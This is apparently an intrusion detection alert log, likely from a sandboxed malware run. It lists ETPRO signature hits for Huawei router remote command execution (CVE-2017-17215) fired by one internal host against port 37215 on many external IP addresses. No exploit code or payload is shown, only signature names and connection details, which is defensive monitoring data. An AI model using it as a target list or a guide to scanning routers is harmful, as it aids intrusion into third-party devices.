                                                    07/10/24-08:27:30.541928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5470637215192.168.2.14157.182.121.205
                                                    07/10/24-08:26:53.177713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443237215192.168.2.14197.74.255.55
                                                    07/10/24-08:26:22.209448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786237215192.168.2.14157.197.194.153
                                                    07/10/24-08:27:32.569542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4363837215192.168.2.14157.115.78.35
                                                    07/10/24-08:26:17.946996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4969637215192.168.2.14157.235.101.243
                                                    07/10/24-08:26:13.849175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3872837215192.168.2.14157.7.182.67
                                                    07/10/24-08:27:23.831762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812637215192.168.2.14197.253.34.218
                                                    07/10/24-08:26:38.543702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598637215192.168.2.14157.68.56.69
                                                    07/10/24-08:26:22.218998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4509437215192.168.2.14197.199.254.96
                                                    07/10/24-08:27:30.485790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5338637215192.168.2.14197.155.149.94
                                                    07/10/24-08:26:43.540694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4648837215192.168.2.14197.156.166.105
                                                    07/10/24-08:26:28.775037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398837215192.168.2.14109.240.75.246
                                                    07/10/24-08:26:29.821987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878837215192.168.2.1441.148.160.211
                                                    07/10/24-08:26:59.757689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216837215192.168.2.14157.166.186.178
                                                    07/10/24-08:27:27.077198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450437215192.168.2.14197.107.182.107
                                                    07/10/24-08:27:07.356942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4504437215192.168.2.14145.87.80.137
                                                    07/10/24-08:27:05.158700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5420637215192.168.2.1441.73.193.252
                                                    07/10/24-08:26:57.536379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482837215192.168.2.1441.47.86.218
                                                    07/10/24-08:27:05.138927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4516837215192.168.2.14172.127.175.165
                                                    07/10/24-08:27:10.635784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442637215192.168.2.1441.81.19.124
                                                    07/10/24-08:26:29.852071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033437215192.168.2.1441.227.58.186
                                                    07/10/24-08:27:24.932186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798637215192.168.2.14157.30.146.198
                                                    07/10/24-08:26:33.266829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4296637215192.168.2.1441.50.171.27
                                                    07/10/24-08:26:29.841336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4023437215192.168.2.14157.144.180.160
                                                    07/10/24-08:27:22.799861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832437215192.168.2.14157.176.149.34
                                                    07/10/24-08:26:41.406016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3298237215192.168.2.14157.85.249.161
                                                    07/10/24-08:27:22.870482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5552237215192.168.2.14180.156.212.121
                                                    07/10/24-08:26:23.328936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862837215192.168.2.14157.90.152.159
                                                    07/10/24-08:26:47.992323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352037215192.168.2.14157.151.65.186
                                                    07/10/24-08:26:43.896757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544637215192.168.2.1441.49.157.93
                                                    07/10/24-08:26:13.787067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4031037215192.168.2.1441.136.152.112
                                                    07/10/24-08:26:26.593118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454637215192.168.2.1441.149.147.206
                                                    07/10/24-08:26:13.694603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5487437215192.168.2.1495.155.239.144
                                                    07/10/24-08:26:25.469425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3498637215192.168.2.1431.29.132.220
                                                    07/10/24-08:26:49.866292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3378637215192.168.2.1441.160.229.215
                                                    07/10/24-08:26:18.028989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440637215192.168.2.14157.228.238.15
                                                    07/10/24-08:27:31.520470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523037215192.168.2.14219.221.234.111
                                                    07/10/24-08:26:57.536379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5606237215192.168.2.14157.89.126.153
                                                    07/10/24-08:27:13.912593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3648037215192.168.2.1441.248.123.72
                                                    07/10/24-08:27:20.494991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5508637215192.168.2.14157.30.243.253
                                                    07/10/24-08:27:14.807488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4497837215192.168.2.14197.60.204.9
                                                    07/10/24-08:26:20.102730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486837215192.168.2.1446.63.247.86
                                                    07/10/24-08:26:13.833960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5815237215192.168.2.14157.187.187.237
                                                    07/10/24-08:26:20.152131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845237215192.168.2.14157.107.20.190
                                                    07/10/24-08:26:33.237564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4128237215192.168.2.1441.14.60.148
                                                    07/10/24-08:26:49.813021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552637215192.168.2.14197.61.90.4
                                                    07/10/24-08:27:28.148356TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5597037215192.168.2.14157.221.198.225
                                                    07/10/24-08:26:22.228367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5553237215192.168.2.1441.173.214.193
                                                    07/10/24-08:26:47.992323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084837215192.168.2.14197.87.179.120
                                                    07/10/24-08:27:23.854070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5023837215192.168.2.14197.59.196.204
                                                    07/10/24-08:26:14.822154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5643237215192.168.2.14157.90.179.156
                                                    07/10/24-08:27:02.789952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239037215192.168.2.14157.139.218.134
                                                    07/10/24-08:26:34.201699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197437215192.168.2.1441.48.239.16
                                                    07/10/24-08:26:11.156956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4730037215192.168.2.14173.121.75.210
                                                    07/10/24-08:26:15.858486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3828637215192.168.2.14157.46.50.140
                                                    07/10/24-08:27:33.863789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267637215192.168.2.1441.221.117.41
                                                    07/10/24-08:26:28.698988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492037215192.168.2.14157.168.91.105
                                                    07/10/24-08:27:13.714524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5008237215192.168.2.1441.239.179.229
                                                    07/10/24-08:26:41.475072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5520237215192.168.2.14197.124.169.183
                                                    07/10/24-08:26:11.565192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4477437215192.168.2.1442.22.253.147
                                                    07/10/24-08:27:14.860796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507637215192.168.2.1419.126.167.26
                                                    07/10/24-08:27:10.558614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4782037215192.168.2.14152.61.141.45
                                                    07/10/24-08:27:05.197081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863437215192.168.2.1435.212.26.223
                                                    07/10/24-08:27:31.526473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3515837215192.168.2.14157.255.248.173
                                                    07/10/24-08:27:05.145286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819037215192.168.2.1441.37.9.106
                                                    07/10/24-08:26:23.300149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5292837215192.168.2.14221.169.243.157
                                                    07/10/24-08:27:19.336820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5066237215192.168.2.14183.79.174.228
                                                    07/10/24-08:27:32.540139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934237215192.168.2.1441.202.93.222
                                                    07/10/24-08:26:13.741925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5973237215192.168.2.14217.238.155.130
                                                    07/10/24-08:26:36.421240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5500437215192.168.2.1441.83.129.244
                                                    07/10/24-08:27:30.477635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5838037215192.168.2.1471.168.185.63
                                                    07/10/24-08:26:48.013030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3569237215192.168.2.1441.145.195.79
                                                    07/10/24-08:27:02.958121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3659837215192.168.2.14162.203.60.43
                                                    07/10/24-08:26:28.841865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5376837215192.168.2.14197.106.197.9
                                                    07/10/24-08:27:08.383825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4380637215192.168.2.14157.106.152.226
                                                    07/10/24-08:27:13.996169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5828837215192.168.2.14197.62.154.35
                                                    07/10/24-08:26:25.418573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081837215192.168.2.14157.61.238.218
                                                    07/10/24-08:26:38.641053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442237215192.168.2.14121.246.39.204
                                                    07/10/24-08:26:59.882583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433037215192.168.2.1441.50.229.62
                                                    07/10/24-08:26:59.538381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4100637215192.168.2.14197.30.27.28
                                                    07/10/24-08:27:24.970396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4175837215192.168.2.1486.86.255.130
                                                    07/10/24-08:26:29.800404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521637215192.168.2.1441.117.72.158
                                                    07/10/24-08:26:43.656959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549637215192.168.2.1499.65.62.85
                                                    07/10/24-08:26:18.029316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5328237215192.168.2.14206.88.145.99
                                                    07/10/24-08:26:22.290742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674437215192.168.2.1431.92.44.246
                                                    07/10/24-08:26:36.372351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4597637215192.168.2.14197.93.74.141
                                                    07/10/24-08:26:52.069445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663437215192.168.2.14157.1.88.6
                                                    07/10/24-08:26:47.758583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121637215192.168.2.14157.15.233.229
                                                    07/10/24-08:27:33.882743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236637215192.168.2.1441.237.127.4
                                                    07/10/24-08:27:07.288154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992437215192.168.2.1441.106.152.205
                                                    07/10/24-08:27:07.390012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3915237215192.168.2.14157.154.223.165
                                                    07/10/24-08:27:13.931040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4280837215192.168.2.14157.108.242.20
                                                    07/10/24-08:26:45.645798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4672437215192.168.2.14121.127.23.76
                                                    07/10/24-08:26:36.409716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513437215192.168.2.14157.202.21.171
                                                    07/10/24-08:27:05.200301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482037215192.168.2.14157.84.222.125
                                                    07/10/24-08:27:30.419826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414637215192.168.2.1441.59.54.173
                                                    07/10/24-08:26:41.395055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635637215192.168.2.14197.150.192.166
                                                    07/10/24-08:26:14.810529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3636637215192.168.2.14197.29.76.98
                                                    07/10/24-08:26:53.114397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5841637215192.168.2.14197.188.73.170
                                                    07/10/24-08:27:27.085141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4395237215192.168.2.14157.80.82.188
                                                    07/10/24-08:27:22.455545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974637215192.168.2.1441.41.167.138
                                                    07/10/24-08:26:33.254680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5294037215192.168.2.14197.199.56.123
                                                    07/10/24-08:27:14.885160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379837215192.168.2.14157.83.244.93
                                                    07/10/24-08:27:19.290152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4101637215192.168.2.14197.106.48.224
                                                    07/10/24-08:26:23.324880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3438437215192.168.2.1441.103.47.228
                                                    07/10/24-08:26:42.400738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576837215192.168.2.1481.216.99.95
                                                    07/10/24-08:26:52.054503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3551437215192.168.2.14197.53.38.148
                                                    07/10/24-08:27:24.988498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5821837215192.168.2.1441.12.103.129
                                                    07/10/24-08:27:27.139115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5879637215192.168.2.14190.45.38.178
                                                    07/10/24-08:26:31.062552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406637215192.168.2.14197.100.23.20
                                                    07/10/24-08:27:28.076787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4868637215192.168.2.1441.77.118.97
                                                    07/10/24-08:27:10.563239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4611637215192.168.2.1441.197.144.172
                                                    07/10/24-08:26:34.164595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658037215192.168.2.1441.241.54.204
                                                    07/10/24-08:26:25.445114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4249437215192.168.2.14197.217.222.61
                                                    07/10/24-08:27:02.767297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203837215192.168.2.14143.157.0.165
                                                    07/10/24-08:27:10.556595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6069437215192.168.2.14197.37.12.164
                                                    07/10/24-08:26:47.933243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4606437215192.168.2.14151.135.124.115
                                                    07/10/24-08:27:10.595154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4223437215192.168.2.1441.213.242.235
                                                    07/10/24-08:26:23.305980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4130037215192.168.2.148.58.70.71
                                                    07/10/24-08:27:32.545820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6033637215192.168.2.14166.48.25.131
                                                    07/10/24-08:26:49.854683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4248037215192.168.2.1425.200.75.156
                                                    07/10/24-08:27:27.083011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4468637215192.168.2.1441.65.34.205
                                                    07/10/24-08:26:28.758809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666237215192.168.2.14197.121.131.254
                                                    07/10/24-08:26:28.684788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5817437215192.168.2.14187.143.13.81
                                                    07/10/24-08:27:02.985510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5288037215192.168.2.14197.177.99.27
                                                    07/10/24-08:26:41.397697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4761237215192.168.2.14157.41.176.75
                                                    07/10/24-08:26:41.430754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3438637215192.168.2.1441.87.222.135
                                                    07/10/24-08:27:23.893533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538637215192.168.2.14197.102.248.167
                                                    07/10/24-08:26:59.753614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491037215192.168.2.14157.145.43.21
                                                    07/10/24-08:27:32.621614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5604437215192.168.2.1496.153.197.252
                                                    07/10/24-08:27:02.731752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941837215192.168.2.14197.218.239.186
                                                    07/10/24-08:27:10.535959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516637215192.168.2.14157.170.234.208
                                                    07/10/24-08:26:36.424272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355437215192.168.2.14157.72.129.56
                                                    07/10/24-08:27:13.800580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188637215192.168.2.14182.73.34.120
                                                    07/10/24-08:26:22.286064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3639237215192.168.2.1441.172.214.225
                                                    07/10/24-08:26:55.297607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348637215192.168.2.14197.72.183.154
                                                    07/10/24-08:26:11.121414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5797637215192.168.2.14197.29.9.130
                                                    07/10/24-08:26:25.505039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5993037215192.168.2.14157.237.4.28
                                                    07/10/24-08:27:13.983533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3527037215192.168.2.14221.22.86.164
                                                    07/10/24-08:26:25.521266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768837215192.168.2.14197.5.4.68
                                                    07/10/24-08:26:14.818070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4045237215192.168.2.1441.59.162.160
                                                    07/10/24-08:27:05.154220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5486037215192.168.2.1439.124.207.9
                                                    07/10/24-08:27:17.064764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4463637215192.168.2.14157.225.132.249
                                                    07/10/24-08:26:53.199768TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5824437215192.168.2.1441.255.236.161
                                                    07/10/24-08:27:17.020582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148237215192.168.2.14157.176.25.68
                                                    07/10/24-08:26:36.327506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4225237215192.168.2.1441.232.128.115
                                                    07/10/24-08:27:07.264352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3843637215192.168.2.14157.59.205.197
                                                    07/10/24-08:26:14.672792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755237215192.168.2.14197.237.32.126
                                                    07/10/24-08:26:43.894192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3323437215192.168.2.1441.218.103.93
                                                    07/10/24-08:27:17.064764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5175437215192.168.2.14197.170.232.181
                                                    07/10/24-08:27:23.453618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4328437215192.168.2.14197.115.5.212
                                                    07/10/24-08:27:22.532375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624437215192.168.2.1485.59.239.104
                                                    07/10/24-08:26:28.761249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142837215192.168.2.14157.213.117.130
                                                    07/10/24-08:26:14.769686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644437215192.168.2.14197.137.53.72
                                                    07/10/24-08:26:53.164158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516637215192.168.2.14157.149.107.31
                                                    07/10/24-08:26:33.249183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688437215192.168.2.14202.228.92.237
                                                    07/10/24-08:26:23.313392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334837215192.168.2.1441.53.139.176
                                                    07/10/24-08:27:19.164570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396637215192.168.2.14114.19.111.231
                                                    07/10/24-08:26:22.240968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4169837215192.168.2.1478.78.244.138
                                                    07/10/24-08:27:24.983854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5214637215192.168.2.14157.222.35.31
                                                    07/10/24-08:26:41.514573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338037215192.168.2.14197.70.234.236
                                                    07/10/24-08:26:11.593269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299037215192.168.2.14157.113.242.221
                                                    07/10/24-08:26:34.201390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187237215192.168.2.1441.84.154.164
                                                    07/10/24-08:26:47.960841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4244637215192.168.2.1441.15.17.218
                                                    07/10/24-08:26:20.130042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3577237215192.168.2.1441.213.214.123
                                                    07/10/24-08:26:43.574763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504837215192.168.2.1464.77.59.92
                                                    07/10/24-08:26:13.787067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890237215192.168.2.14157.71.211.82
                                                    07/10/24-08:27:05.220771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4082637215192.168.2.14197.23.132.3
                                                    07/10/24-08:27:20.519262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970437215192.168.2.14149.123.226.223
                                                    07/10/24-08:27:28.076787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5958437215192.168.2.1414.114.176.107
                                                    07/10/24-08:26:15.871447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5028037215192.168.2.1459.38.200.192
                                                    07/10/24-08:27:33.959162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4465437215192.168.2.1441.5.12.229
                                                    07/10/24-08:26:59.522844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010837215192.168.2.1470.104.11.198
                                                    07/10/24-08:26:59.634541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523837215192.168.2.14197.153.184.12
                                                    07/10/24-08:27:02.857366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405437215192.168.2.14157.202.233.166
                                                    07/10/24-08:27:13.815715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983837215192.168.2.14188.38.107.17
                                                    07/10/24-08:27:31.453748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5903237215192.168.2.14157.40.166.76
                                                    07/10/24-08:27:23.889378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738437215192.168.2.14197.193.170.6
                                                    07/10/24-08:26:31.077497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3555237215192.168.2.14197.168.19.226
                                                    07/10/24-08:26:26.588414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030037215192.168.2.14157.10.196.147
                                                    07/10/24-08:26:43.851748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3313837215192.168.2.14197.59.126.74
                                                    07/10/24-08:27:22.492179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959837215192.168.2.14106.139.92.193
                                                    07/10/24-08:26:17.972385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3716237215192.168.2.14197.22.193.65
                                                    07/10/24-08:26:14.816680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5620837215192.168.2.1441.221.48.136
                                                    07/10/24-08:27:16.994273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3380837215192.168.2.1441.23.12.17
                                                    07/10/24-08:27:13.808295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6029237215192.168.2.14157.247.117.137
                                                    07/10/24-08:26:42.391743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104837215192.168.2.14162.41.182.238
